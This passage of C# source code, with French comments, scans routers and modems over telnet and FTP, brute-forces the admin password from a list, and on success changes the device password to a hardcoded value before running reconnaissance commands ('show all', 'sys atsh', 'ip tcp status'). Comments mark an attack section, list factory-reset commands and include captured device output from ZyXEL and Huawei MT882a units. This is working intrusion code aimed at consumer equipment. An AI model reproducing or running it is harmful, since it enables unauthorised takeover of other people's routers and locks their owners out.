                    //Enter the new password (minimum of 5, maximum of 8 characters)
                    //Please use a combination of upper and lower case letters and numbers.
                    //Enter new password:
                    //Re-enter new password:
                    //Password changed.
                    //root@dm800:~#


                    //********************************************************
                    //BusyBox on (none) login: bad
                    //Password:
                    //Login incorrect

                    //BusyBox on (none) login: admin
                    //Password:


                    //BusyBox v0.61.pre (2008.01.25-06:33+0000) Built-in shell (ash)
                    //Enter 'help' for a list of built-in commands.

                    //# help

                    //Built-in commands:
                    //-------------------
                    //        . : bg break builtin cd chdir continue eval exec exit export
                    //        false fc fg hash help jobs kill local pwd read readonly return
                    //        set setvar shift times trap true type ulimit umask unset wait


                    //********************************************************
                    //User Access Verification
                    //
                    //Password:
                    //Password:
                    //Password:
                    //% Bad passwords


                    //********************************************************
                    //Huawei Home Gateway 550
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //Login: bad
                    //Password:
                    //Login incorrect. Try again.
                    //Login: admin
                    //Password:
                    //Login incorrect. Try again.
                    //Login: admin
                    //Password:
                    //Authorization failed after trying 3 times!!!.
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //wl driver adapter not found
                    //Login:

                    #endregion

                    foreach (string password in passwords)
                    {
                        Thread.Sleep(100);
                        try
                        {
                            Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                            Sock_scan.Connect(ip);


                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                       //     Console.WriteLine("{0} -> Banner telnet: " + stringdata, myip);

                            //Console.WriteLine("DEBUG Trying Password:{0}", password);
                            //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
                            Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password+"\r"),SocketFlags.None);
                            /*
                            Byte[] smk = new Byte[password.Length];
                            for (int i = 0; i < password.Length; i++)
                            {
                                Byte ss = Convert.ToByte(password[i]);
                                smk[i] = ss;
                            }
                            Sock_scan.Send(smk, 0, smk.Length, SocketFlags.None);
                            */

                            //Thread.Sleep(100);
                            
                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            //Console.WriteLine("{0} -> Response telnet: " + stringdata, myip);
                            recv = Sock_scan.Receive(data);
                            stringdata = Encoding.ASCII.GetString(data, 0, recv);
                            Console.WriteLine("{0} -> Response telnet02: " + stringdata, myip);
                            if (stringdata == "")
                            {
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> Response telnet02b: " + stringdata, myip);
                            }

                            //stringdata = null;
                            //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
                            //Console.WriteLine("Response telnet: " + strRetPage);
                            //while (bytes > 0)
                            //{
                            //    bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                            //    stringdata = stringdata + ASCII.GetString(RecvBytes, 0, bytes);
                            //    Console.WriteLine("Response telnet: " + strRetPage);
                            //}

                            

                            //Bad Password!!!
                            if (stringdata.Contains("assword:") || stringdata.Contains("Bad Password"))    //stringdata.Contains("*")
                            {
                            //    Console.WriteLine("{0} -> bad telnet password: {1}\n", myip, password);
                                Sock_scan.Close();
                            }
                            else
                            {
                                Console.WriteLine("***********************************************************");
                                Console.WriteLine("{0} -> TELNET PASSWORD FOUND: {1}\n", myip, password);
                                Console.WriteLine("***********************************************************");

                                if(stringdata.Contains("ZyXEL"))    //1234
                                {
                                    if (stringdata.Contains("Menu"))    //1234
                                    {
                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("23" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        //             Menu 23 - System Password
                                         //Old Password= ?
                                         //New Password= ?
                                         //Retype to confirm= ?

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);

                                        //(Saving to ROM...)
                                        //Retour menu
                                    }
                                    else
                                    {
                                        Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys adminPassword j3R0m3!!" + "\r"), SocketFlags.None);
                                        recv = Sock_scan.Receive(data);
                                        stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                        Console.WriteLine("{0} -> " + stringdata, myip);
                                    }
                                }
                                else
                                {
                                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys password j3R0m3!!" + "\r"), SocketFlags.None);
                                    recv = Sock_scan.Receive(data);
                                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                    Console.WriteLine("{0} -> " + stringdata, myip);
                                    //save ok, new password is: j3R0m3!!.

                                    ////Exemple: Vulcan
                                    ////Erreur: Commande Invalide     
                                    ////$passwd
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
                                    ////Enter Old Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
                                    ////Enter New Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                    ////Confirm New Password:
                                    //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
                                    ////Set Done
                                    ////SINON:    Erreur: Combinaison nom dÆutilisateur/mot de passe invalide
                                }

                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("show all" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                //***************
                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("sys atsh" + "\r"), SocketFlags.None);   //for MAC address
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                /*
                                    D-Link DSL 526B                                 >restoredefault
                                    Huawei SmartAX MT882a              >sys romreset
                                    TP-Link TD-8817                                >sys romreset
                                */

                                //***************
                                //For MT882A
                                /*
                                MT882a> ether config
                                --------------- NDIS CONFIGURATION BLOCK ----------------
                                type=1 flags=0001
                                Board/Chassis:1  Lines/Board:1  Channels/Lines:2 Total Channel:2
                                task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
                                board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
                                board-pp (8042c8f0)
                                804273fc
                                line-pp (8042c8f4)
                                8042956c
                                chann-pp (8042c8f8)
                                804bf8a4 804bfe34
                                --------------- BOARD DISPLAY ---------------------------
                                ID  slot#  n-line  n-chann  status  line-cfg  chann-cfg
                                00      0       1        2    0001  8042c8bc    8042c8d0
                                --------------- LINE  DISPLAY ---------------------------
                                ID  line#  board-id  n-chann  chann-cfg
                                00      1  00              2  8042c8d0
                                --------------- CHANNEL DISPLAY -------------------------
                                ID  chan#  line-id  board-id  address name
                                00      1  00       00        804bf8a4  enet0
                                01      2  00       00        804bfe34  enet1
                                */
                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ether config" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);


                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);

                                /*
                                MT882a> ip tcp status
                                ( 1)tcpRtoAlgorithm              4     ( 2)tcpRtoMin                    0
                                ( 3)tcpRtoMax           4294967295     ( 4)tcpMaxConn                  16
                                ( 5)tcpActiveOpens               0     ( 6)tcpPassiveOpens            477
                                ( 7)tcpAttemptFails             42     ( 8)tcpEstabResets              22
                                ( 9)tcpCurrEstab                 1     (10)tcpInSegs                 9765
                                (11)tcpOutSegs                2549     (12)tcpRetransSegs             389
                                (14)tcpInErrs                    2     (15)tcpOutRsts                  93
                                 tcbsInUseCnt = 4
                                    &TCB Rcv-Q Snd-Q  Local socket           Remote socket          State
                                804fdce4     0   621  41.248.40.35:23        196.12.232.120:61565   Estab 0
                                804fd66c     0     0  0.0.0.0:21             0.0.0.0:0              Listen 0
                                804fd558     0     0  0.0.0.0:7547           0.0.0.0:0              Listen (S) 0
                                804fd444     0     0  0.0.0.0:80             0.0.0.0:0              Listen (S) 0
                                */

                                Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);
                                recv = Sock_scan.Receive(data);
                                stringdata = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0} -> " + stringdata, myip);



                                //ATTACK
                                /*
                                MT882a> ip ping
                                Usage: ping <hostid>
                                MT882a> ip ping www.google.com
                                Resolving www.google.com... 173.194.67.105
                                      sent      rcvd  rate    rtt     avg    mdev     max     min
                                         1         1  100      80      80       0      80      80
                                         2         2  100      80      80       0      80      80
                                         3         3  100      80      80       0      80      80
                                */

                                /*
                                MT882a> ip route
                                status          add             addiface        addprivate
                                addrom          drop
                                MT882a> ip route status
                                Dest            FF Len Device  Gateway         Metric stat Timer  Use   RN
                                41.248.40.1     00 32  poe0    41.248.40.1       1    0329 0      0     ISP-0
                                192.168.1.0     00 24  enet0   192.168.1.1       1    041b 0      0
                                default         00 0   poe0    ISP-0             2    00ab 0      3245  ISP-0
                                */

                                /*
                                MT882a> ether driver
                                cnt             status          config          ackdrop
                                macnum          ackmode         etherppp        wan2lan
                                MT882a> ether driver cnt
                                disp
                                MT882a> ether driver cnt disp
                                Usage: disp <name>
                                MT882a> ether driver status
                                Usage: driver status <ch-name>
                                MT882a> ether driver config
                                Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
                                MT882a> ether driver ackdrop
                                current ack drop number is 0
                                ack drop cnt=0
                                Usage: ackdrop <number>
                                MT882a> ether driver macnum
                                Please input allowed mac number(0~255), 0 means no limitation
                                Current allowed mac number: 0
                                MT882a> ether driver ackmode
                                TCP ACK mode: off
                                ACK length: 90
                                TCP ACK mode type: Task
                                MT882a> ether driver etherppp
                                PPP check : on

                                MT882a> ether driver wan2lan
                                Usage: wan2lan [on||off] <number>
                                Current wan2lan feature status: off
                                */



                                /*
                                MT882a> wan
                                atm             node            hwsar           adsl
                                tsarm
                                MT882a> wan atm
                                test            mpoasendloop    oam             vcpool
                                MT882a> wan atm test
                                Usage: test [fix|rand|period|oam|loopback]
                                MT882a> wan node
                                index           display         clear           save
                                ispname         enable          disable         encap
                                mux             vpi             vci             qos
                                pcr             scr             mbs             cdvt
                                wanip           remoteip        bridge          routeip
                                nat             rip             multicast       callsch
                                service         nailedup        filter          ppp
                                mtu             default_r
                                MT882a> wan node display
                                WAN node index = 1
                                Active = no
                                Route IP = off
                                Bridge = off
                                Name =
                                Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
                                Mux <1:LLC|2:VC> = 0
                                VPI/VCI = 0 / 0
                                PPPoE service name =
                                PPP username =
                                PPP password =
                                PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
                                SUA/NAT is disabled
                                Static IP address
                                WAN IP address        = 0.0.0.0
                                Remote IP address     = 0.0.0.0
                                Remote IP subnet mask = 0.0.0.0
                                Idle timeout = 0
                                Call scheduling set =   1  1  1  1
                                Nailed-up connection = off
                                QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
                                QOS PCR/SCR/MBS/CDVT =     0,    0,    0,    0
                                RIP direction <0:none|1:both|2:in|3:out>= 0
                                RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
                                Multicast <0:IGMP-v2|1:IGMP-v1|2:none>  = 0
                                Incoming protocol filter set =   1  1  1  1
                                Incoming device filter set   =   1  1  1  1
                                Outgoing protocol filter set =   1  1  1  1
                                Outgoing device filter set   =   1  1  1  1
                                MT882a> wan node wanip
                                Usage: wan node wanip <static> <ip address>
                                or:    wan node wanip <dynamic>
                                errcode = -4
                                */



                                /*
                                MT882a> wan adsl
                                chandata        close           coding          defbitmap
                                linedata        open            opencmd         opmode
                                perfdata        reset           status          version
                                vendorid        utopia          nearituid       farituid
                                cellcnt         display         rateadap        dumpcondition
                                sampletime      noisegt         noisemargin     persisttime
                                timeinterval    defectcheck     txgain          targetnoise
                                txfilter        setrvid         txtones         snroffset
                                errorsecond     diag            watchdog        fwversion
                                uptime          dumprate        annex
                                MT882a> wan adsl display
                                shutdown        rateup
                                MT882a> wan adsl fwversion
                                DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
                                
                                MT882a> wan adsl utopia
                                UTOPIA parameters:
                                   level: 1
                                   fast address: 0
                                   interleaved address: 1
                                MT882a> wan adsl coding
                                line coding: DMT
                                MT882a> wan adsl txtones
                                usage: <start tone> <end tone> tone=0x6~0x1F
                                current value: start_tone=6 end_tone=1f
                                MT882a> wan adsl opmode
                                operational mode: ITU G.992.5(ADSL2PLUS)
                                
                                MT882a> wan adsl uptime
                                    ADSL uptime   122:15:16
                                    MT882a> wan adsl sampletime
                                    Usage: min
                                    MT882a> wan adsl linedata
                                    far             near
                                    MT882a> wan adsl linedata near
                                    relative capacity occupation: 100%
                                    noise margin downstream: 37.0 db
                                    output power upstream: 11.3 dbm
                                    attenuation downstream: 13.7 db
                                    MT882a> wan adsl linedata far
                                    relative capacity occupation: 100%
                                    noise margin upstream: 34.5 db
                                    output power downstream: 19.3 dbm
                                    attenuation upstream: 9.6 db
                                    carrier load: number of bits per symbol(tone)
                                    tone   0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
                                    tone  32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
                                    tone  64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
                                    tone  96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
                                    tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
                                    tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
                                    tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
                                    tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
                                    tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                
                                MT882a> dot1q disp
                                        802.1Q Tagged-based VLAN: Inactive(1)

                                         Port | PVID   || Port | PVID   || Port | PVID   || Port | PVID   ||
                                        ------+--------++------+--------++------+--------++------+--------++
                                           e1 |     1  ||
                                           p0 |     1  ||   p1 |     1  ||   p2 |     1  ||   p3 |     1  ||
                                           p4 |     1  ||   p5 |     1  ||   p6 |     1  ||   p7 |     1  ||
                                            u |     1  ||
                                          cpu |    15  ||

                                        No|Act| VID|    Name   |        Egress Port
                                        --+---+----+-----------+------------------------------------------
                                                               |    Tagged Egress Port
                                                               +------------------------------------------
                                         0| N |   0|           |
                                                               |
                                         1| N |   0|           |
                                                               |
                                         2| N |   0|           |
                                                               |
                                         3| N |   0|           |
                                                               |
                                         4| N |   0|           |
                                                               |
                                         5| N |   0|           |
                                                               |
                                         6| N |   0|           |
                                                               |
                                         7| N |   0|           |
                                                               |
                                         8| N |   0|           |
                                                               |
                                         9| N |   0|           |
                                                               |
                                        10| N |   0|           |
                                                               |
                                        11| N |   0|           |
                                                               |
                                        12| N |   0|           |
                                                               |
                                        13| N |   0|           |
                                                               |
                                        14| Y |   1|     vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
                                                               |
                                        15| Y |  15|     vlan15|e1,u
                                                               |
                                */






                                Sock_scan.Close();
                                break;
                            }
                        }
                        catch (Exception e)
                        {
                            Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
                        }
                    }
                }
                else
                {
                    Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
                }
                
//                Sock_scan.Close();
        }

        public static void ftptry(string myip)
        {
            Console.WriteLine("ftptry");

            byte[] data = new byte[1024];
            string stringdata;
            int recv;

            IPAddress adresseIP = IPAddress.Parse(myip);
            IPEndPoint ip = new IPEndPoint(adresseIP, 21);
            Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            Sock_scan.Connect(ip);

            recv = Sock_scan.Receive(data);
            Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));

            foreach (string password in passwords)
            {
                try
                {
                    Console.WriteLine("{0} -> USER", myip);
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
                    recv = Sock_scan.Receive(data);
                    Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
                    //331 Please specify the password.
                    //331 Enter PASS command
                    //331 User name okay, need password.

                    Console.WriteLine("{0} -> PASS", myip);
                    Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
                    recv = Sock_scan.Receive(data);
                    stringdata = Encoding.ASCII.GetString(data, 0, recv);
                    Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
                    //530 Login incorrect.
                    //530 Not logged in.
                    //530 User admin cannot log in.
                    if (stringdata.Contains("530"))
                    {
                        Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
                    }
                    //230 User logged in, proceed.
                    if (stringdata.Contains("230"))
                    {
                        Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
                        break;
                    }

                }
                catch (Exception e)
                {
                    Console.WriteLine("{0} -> " + e.Message, myip);
                }
            }

            Sock_scan.Close();

            /*
            FtpWebRequest reqFTP;
            reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
            reqFTP.Credentials = new NetworkCredential("login", "pass");
            reqFTP.KeepAlive = false;
            reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
            // On recupere la response du serveur FTP
            FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
            Console.WriteLine("{0} -> Réponse FTP:" + response, myip);

        /*
            // On récupere le flux de la réponse
            StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
            //On enregistre la liste dans un chaine
            string listeBrute = monStreamReader.ReadToEnd();
            //On recupere l'ensemble des fichiers de la chaine
            string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
            //On retourne la liste des répertoires
            //return liste;
        */


        }

/*
        public static void ConnectCallback(IAsyncResult ar)
        {
            try
            {
                // Get The connection socket from the callback
                Socket sock1 = (Socket)ar.AsyncState;
                sock1.Blocking = false; // This is a non blocking IO
                if (sock1.Connected)
                {
                    // Define a new Callback to read the data 
                    AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
                    // Begin reading data asyncronously
                    sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
            }
        }
*/

        private static void ConnectCallback(IAsyncResult ar)
        {
            try
            {
                
                // Retrieve the socket from the state object.
                Socket client = (Socket)ar.AsyncState;

                // Complete the connection.
                client.EndConnect(ar);

                Console.WriteLine("Socket connected to {0}",
                    client.RemoteEndPoint.ToString());

                // Signal that the connection has been made.
                connectDone.Set();
                
                Console.WriteLine("DEBUG ConnectCallback");
                //cpt_th.Decrementer();
            }
            catch (Exception e)
            {
                Console.WriteLine("ERROR ConnectCallback: "+e.ToString());
            }
        }

        private static void Receive(Socket client)
        {
            try
            {
                // Create the state object.
                StateObject state = new StateObject();
                state.workSocket = client;

                // Begin receiving the data from the remote device.
                client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
                    new AsyncCallback(ReceiveCallback), state);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }

        private static void ReceiveCallback(IAsyncResult ar)
        {
            try
            {
                // Retrieve the state object and the client socket 
                // from the asynchronous state object.
                StateObject state = (StateObject)ar.AsyncState;
                Socket client = state.workSocket;

                // Read data from the remote device.
                int bytesRead = client.EndReceive(ar);

                if (bytesRead > 0)
                {
                    // There might be more data, so store the data received so far.
                    state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead));

                    // Get the rest of the data.
                    client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
                        new AsyncCallback(ReceiveCallback), state);
                }
                else
                {
                    // All the data has arrived; put it in response.
                    if (state.sb.Length > 1)
                    {
                        response = state.sb.ToString();
                    }
                    // Signal that all bytes have been received.
                    receiveDone.Set();
                }
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }


        // State object for receiving data from remote device.
        public class StateObject
        {
            // Client socket.
            public Socket workSocket = null;
            // Size of receive buffer.
            public const int BufferSize = 256;
            // Receive buffer.
            public byte[] buffer = new byte[BufferSize];
            // Received data string.
            public StringBuilder sb = new StringBuilder();
        }






        private static string ProcessOptions(byte[] m_strLineToProcess)
        {
            string m_DISPLAYTEXT = "";
            string m_strTemp = "";
            string m_strOption = "";
            string m_strNormalText = "";
            bool bScanDone = false;
            int ndx = 0;
            int ldx = 0;
            char ch;
            try
            {
                for (int i = 0; i < m_strLineToProcess.Length; i++)
                {
                    Char ss = Convert.ToChar(m_strLineToProcess[i]);
                    m_strTemp = m_strTemp + Convert.ToString(ss);
                }

                while (bScanDone != true)
                {
                    int lensmk = m_strTemp.Length;
                    ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
                    if (ndx > lensmk)
                        ndx = m_strTemp.Length;

                    if (ndx != -1)
                    {
                        m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
                        ch = m_strTemp[ndx + 1];
                        if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
                        {
                            m_strOption = m_strTemp.Substring(ndx, 3);
                            string txt = m_strTemp.Substring(ndx + 3);
                            m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
                            m_ListOptions.Add(m_strOption);
                            m_strTemp = txt;
                        }
                        else
                            if (ch == IAC)
                            {
                                m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
                                m_strTemp = m_strTemp.Substring(ndx + 1);
                            }
                            else
                                if (ch == SB)
                                {
                                    m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
                                    ldx = m_strTemp.IndexOf(Convert.ToString(SE));
                                    m_strOption = m_strTemp.Substring(ndx, ldx);
                                    m_ListOptions.Add(m_strOption);
                                    m_strTemp = m_strTemp.Substring(ldx);
                                }
                    }
                    else
                    {
                        m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
                        bScanDone = true;
                    }
                }
                m_strNormalText = m_DISPLAYTEXT;
            }
            catch (Exception eP)
            {
                Console.WriteLine(eP.Message, "Application Error!!!");
                //Application.Exit();
            }
            return m_strNormalText;
        }

        public static void OnRecievedData(IAsyncResult ar)
        {
            // Get The connection socket from the callback
            Socket sock = (Socket)ar.AsyncState;
            sock.Blocking = false; // This is a non blocking IO
            // Get The data , if any
            int nBytesRec = sock.EndReceive(ar);
            if (nBytesRec > 0)
            {
                string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
                string m_strLine = "";
                string myline = null;
                for (int i = 0; i < nBytesRec; i++)
                {
                    Char ch = Convert.ToChar(m_byBuff[i]);
                    switch (ch)
                    {
                        case '\r':
                            m_strLine += Convert.ToString("\r\n");
                            break;
                        case '\n':
                            break;
                        default:
                            m_strLine += Convert.ToString(ch);
                            break;
                    }
                }
                try
                {
                    int strLinelen = m_strLine.Length;
                    if (strLinelen == 0)
                    {
                        m_strLine = Convert.ToString("\r\n");
                    }

                    Byte[] mToProcess = new Byte[strLinelen];
                    for (int i = 0; i < strLinelen; i++)
                        mToProcess[i] = Convert.ToByte(m_strLine[i]);
                    // Process the incoming data
                    string mOutText = ProcessOptions(mToProcess);
                    //if (mOutText != "")
                    //    textBox1.AppendText(mOutText);
                        myline+=mOutText;
                    //Console.WriteLine("Received data: {0}", mOutText);

                    // Respond to any incoming commands
                    //RespondToOptions();
                }
                catch (Exception ex)
                {
                    //Object x = this;
                    Console.WriteLine(ex.Message, "Information!");
                }
                Console.WriteLine("Received data: {0}", myline);


                if (myline.Contains("Password:"))
                {
                    foreach (string password in passwords)
                    {
                        Thread.Sleep(100);
                        try
                        {
